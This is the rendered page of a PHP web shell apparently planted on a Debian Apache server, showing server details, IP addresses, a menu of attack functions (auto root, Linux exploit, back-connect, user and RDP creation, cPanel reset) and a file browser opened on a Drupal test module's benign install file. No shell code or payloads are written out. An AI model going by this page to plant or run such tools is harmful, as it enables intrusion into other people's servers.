Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 52.14.213.73
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
node /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
node_access_test.info
283
B
-rw-r--r--
node_access_test.install
1
KB
-rw-r--r--
node_access_test.module
6.17
KB
-rw-r--r--
node_test.info
273
B
-rw-r--r--
node_test.module
4.97
KB
-rw-r--r--
node_test_exception.info
293
B
-rw-r--r--
node_test_exception.module
306
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : node_access_test.install
<?php /** * @file * Install, update and uninstall functions for the node_access_test module. */ /** * Implements hook_schema(). */ function node_access_test_schema() { $schema['node_access_test'] = array( 'description' => 'The base table for node_access_test.', 'fields' => array( 'nid' => array( 'description' => 'The {node}.nid this record affects.', 'type' => 'int', 'unsigned' => TRUE, 'not null' => TRUE, 'default' => 0, ), 'private' => array( 'description' => 'Boolean indicating whether the node is private (visible to administrator) or not (visible to non-administrators).', 'type' => 'int', 'not null' => TRUE, 'default' => 0, ), ), 'indexes' => array( 'nid' => array('nid'), ), 'primary key' => array('nid'), 'foreign keys' => array( 'versioned_node' => array( 'table' => 'node', 'columns' => array('nid' => 'nid'), ), ), ); return $schema; }
Close